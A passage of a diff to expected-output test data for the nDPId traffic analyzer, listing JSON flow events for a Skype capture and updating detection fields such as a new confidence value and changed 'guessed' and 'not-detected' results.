-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706169,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
